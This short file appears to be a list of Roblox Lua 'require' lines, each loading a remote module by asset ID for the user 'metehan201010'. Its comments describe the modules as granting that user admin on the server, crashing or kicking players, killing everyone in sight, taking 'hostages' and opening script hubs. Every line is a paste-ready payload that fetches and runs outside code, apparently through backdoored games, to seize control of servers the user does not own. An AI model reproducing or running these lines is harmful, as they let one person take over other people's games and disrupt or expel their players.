require(12000293614).PocketTK("metehan201010") --best script
require(4875966146).load('metehan201010') --op monster
require(4869378421).F3X('metehan201010') --buildng tools
require(4585652241).load('metehan201010') --R6
require(7486656912).Juggernaut('metehan201010') --Kills everyone that he sees
require(5887966886).EH('metehan201010') --script hub
require(8957416160).LoadAdmin('Adonis', 'metehan201010') -- Not a rank giver, add Adonis Admin to game and grants Admin.
require(8946786542).load('metehan201010') --coolkid
require(8481157152).TF2Engineer('metehan201010') --tf2 enginar
require(6053693667).Crashexe('metehan201010') --crashplayers
require(4786706026):dex('metehan201010') --dex ss
require(7203746402).tonk('metehan201010') --tank
require(8247348648).ServerAdmin('metehan201010') --server adman
require(4769713563).load('metehan201010') -- spectrum glitcher
require(6274987259).v2('metehan201010') --cool but doesnt work
require(7192763922).load("metehan201010") --hd admin
require(4690715583)("metehan201010") --hostage 
require(12800239776).kick("Username") -- kick
